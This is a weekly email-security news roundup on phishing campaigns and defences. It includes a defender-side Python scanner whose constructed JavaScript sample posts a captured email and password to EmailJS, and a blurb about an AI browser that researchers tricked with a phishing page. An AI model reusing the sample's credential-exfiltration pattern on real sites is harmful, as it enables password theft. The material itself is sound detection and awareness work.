What's happening in email security: March 9-15, 2026
Attackers keep moving credential theft onto infrastructure defenders are reluctant to block. This week that meant a phishing kit built as a React app, hosted on Cloudflare Workers, and exfiltrating passwords through EmailJS.
At the same time, the market data is clear on the defender side too: post-delivery cleanup, analyst workload, and identity-layer controls are now where email security programs win or lose.
A React-Based Phishing Kit Turned EmailJS and Cloudflare Workers Into Credential Theft Infrastructure
This campaign is worth a close look because the attacker choices were built around how modern email defenses actually work.
The lure was a fake WeTransfer notification. The payload was not a static phishing page that scanners could parse easily. SANS found a React single-page application that assembled the credential theft flow dynamically in the browser. That matters because static HTML analysis has less to inspect when the page logic is bundled and rendered at runtime.
The exfiltration path was even more telling. Stolen credentials were sent through EmailJS, a legitimate email API service, instead of to attacker-controlled infrastructure. Geographic metadata was pulled through Geoapify, and the whole operation sat on a Cloudflare Workers domain. In practice, that means multiple layers of the campaign blend into normal SaaS and edge-service traffic that many security teams are hesitant to block outright.
This is the bigger trend to watch. Attackers are steadily replacing obviously malicious infrastructure with reputable services that already exist in enterprise traffic patterns. Reputation checks and coarse allowlists get weaker when the phishing stack lives on platforms users and defenders recognize. The hardcoded EmailJS identifiers found in the bundle show how little custom infrastructure an operator now needs to run a credible credential-harvesting campaign.
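As an added illustration, not part of the original write-up or the SANS analysis, here is a defender-side static check in Python over a constructed bundle fragment: it flags the pairing the section describes, a credential form wired to a third-party email API (EmailJS) alongside geolocation and Workers-hosted indicators. The API hostnames, the `service_`/`template_` identifier shapes and the sample bundle are assumptions, not values from the real kit.

```python
import re
from typing import Dict, List

# Third-party services the campaign above leaned on. Hostnames are the services'
# public API hosts as assumed here; the service_/template_ shapes are an
# assumption about how EmailJS names its identifiers.
EXFIL_HOSTS = {
    "api.emailjs.com": "EmailJS (email API that can mail out captured form data)",
    "api.geoapify.com": "Geoapify (geolocation metadata)",
}
EMAILJS_ID_RE = re.compile(r"\b(?:service|template)_(?!params\b)[A-Za-z0-9]{6,}\b")
WORKERS_HOST_RE = re.compile(r"\bhttps?://[a-z0-9.-]+\.workers\.dev\b")
CREDENTIAL_FIELD_RE = re.compile(r"\b(password|passwd|pwd|email|username)\b\s*:", re.I)


def scan_bundle(js: str) -> Dict[str, List[str]]:
    """Collect exfil-service hosts, EmailJS identifiers, Workers hosts and credential field names."""
    return {
        "hosts": [f"{h}: {label}" for h, label in EXFIL_HOSTS.items() if h in js],
        "emailjs_ids": sorted(set(EMAILJS_ID_RE.findall(js))),
        "workers_hosts": sorted(set(WORKERS_HOST_RE.findall(js))),
        "credential_fields": sorted({m.group(1).lower() for m in CREDENTIAL_FIELD_RE.finditer(js)}),
    }


def verdict(findings: Dict[str, List[str]]) -> str:
    """A password field and an email API in one bundle is the telltale pairing;
    either alone (a contact form, a Workers-hosted app) is only worth a look."""
    uses_emailjs = bool(findings["emailjs_ids"]) or any(
        h.startswith("api.emailjs.com") for h in findings["hosts"]
    )
    if uses_emailjs and "password" in findings["credential_fields"]:
        return "high: credential form wired to EmailJS"
    if uses_emailjs or findings["workers_hosts"] or findings["hosts"]:
        return "medium: third-party exfil or hosting indicators without a password field"
    return "low: no indicators"


# Constructed fragment resembling a minified SPA bundle; not taken from the real kit.
SAMPLE_BUNDLE = """
const e="https://api.emailjs.com/api/v1.0/email/send";
fetch("https://api.geoapify.com/v1/ipinfo?apiKey=PLACEHOLDER").then(r=>r.json());
const send=(u,p)=>fetch(e,{method:"POST",body:JSON.stringify({service_id:"service_abc1234",
template_id:"template_xyz9876",user_id:"PLACEHOLDER_PUBLIC_KEY",template_params:{email:u,password:p}})});
location.href="https://example-transfer.workers.dev/done";
"""

if __name__ == "__main__":
    result = scan_bundle(SAMPLE_BUNDLE)
    for key, values in result.items():
        print(f"{key}: {values}")
    print(verdict(result))
```

Legitimate sites use EmailJS for contact forms and Workers for hosting, so the check only escalates when a password field is sent through the email API; the individual indicators are a reason to look, not to block.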
Sednit Is Back to Spear-Phishing as a Primary Access Route
ESET's latest Sednit research is a reminder that spear-phishing is still doing real work for advanced operators in 2026.
Since April 2024, the GRU-linked group has deployed a refreshed toolset including SlimAgent, BeardShell, and a modified Covenant framework, with cloud storage services used for command and control. But the initial access detail is the important part here. ESET says the campaigns against Ukrainian military personnel began with spear-phishing that exploited CVE-2026-21509.
The takeaway is straightforward. Sophisticated actors are not moving away from email. They are combining phishing with recent vulnerabilities and cloud-hosted post-compromise infrastructure, which makes the handoff from inbox to persistence faster and harder to disrupt.
INTERPOL's Latest Takedown Shows the Scale of Global Phishing Infrastructure
Operation Synergia Phase 3 took down 45,000 malicious IPs and servers across 72 countries. The standout number for email defenders was Macau's disruption of more than 33,000 phishing websites targeting banks, government entities, and payment services.
That count matters because it is a useful corrective to how teams often think about phishing campaigns. What lands in the inbox is only the visible edge of a much larger, industrial support system of domains, pages, redirects, and hosting nodes. Takedowns like this reduce attacker capacity, but they also show how much infrastructure can sit behind seemingly routine credential-harvesting emails.
Attackers Are Impersonating Signal Support to Hijack Accounts
Dutch intelligence says this campaign is large-scale and global, targeting officials, military personnel, civil servants, and journalists by posing as "Signal Security Support Chatbot." Attackers ask for verification codes and PINs or send malicious QR codes disguised as group invitations so victims link an attacker-controlled device to their account. There is no crypto break here. The impersonation is the attack. For email teams, the lesson is familiar: trusted-brand support language still converts because it creates urgency, legitimacy, and a reason to bypass normal skepticism.
Microsoft's Latest Benchmark Puts More Weight on Post-Delivery Cleanup
Microsoft's latest email security benchmark focuses on malicious messages that reached the inbox, not just what got blocked before delivery. In that model, Microsoft says Defender's Zero-Hour Auto Purge accounts for 70.8% of average post-delivery remediation, with integrated cloud email security partners contributing another 29.2%. The vendor politics matter less than the measurement choice. This is where many programs actually fail. A message that reaches the inbox is no longer a filtering problem alone. It becomes a speed-of-detection, remediation, and operational workflow problem.
Attack Volume Is Becoming a Deliberate Way to Blind Security Teams
One of the more useful arguments this week came from research on SOC workload exhaustion. If 66% of SOC teams cannot keep pace with alert volume, then high-volume phishing is not just noise. It is a tactic. Flood the queue with commodity email attacks, hide the better spear-phish in the middle, and the defender's review process becomes part of the attack surface. Email security teams should treat triage capacity and investigation speed as security controls, not as back-office efficiency metrics.
- How to Scale Phishing Detection in Your SOC: 3 Steps for CISOs
A practical blueprint for sandboxed phishing analysis, automated multi-step investigation, and SSL decryption to expose credential theft hidden in encrypted traffic.
- Researchers Tricked Perplexity's Comet AI Browser Into a Phishing Scam in Under Four Minutes
Guardio showed phishing pages can now be optimized against an AI browser's own reasoning and safety checks, a warning for AI-assisted email analysis products too.
- Your Signal Account Is Safe, Unless You Fall for This Trick
A follow-up look at the same Signal impersonation campaign with extra detail on fake support chats, QR-based device linking, and user-side mitigations.
- Initial Access Techniques Used by Iran-Based Threat Actors
Sophos highlights phishing, Exchange exploitation, Microsoft 365 password spraying, and remote management tool abuse as recurring entry points for Iran-linked groups.
- Meta Disables 150K Accounts Linked to Southeast Asia Scam Centers
Meta's crackdown shows how industrial scam operations keep scaling, with WhatsApp QR-code abuse and messaging-platform defenses that mirror email account-takeover patterns.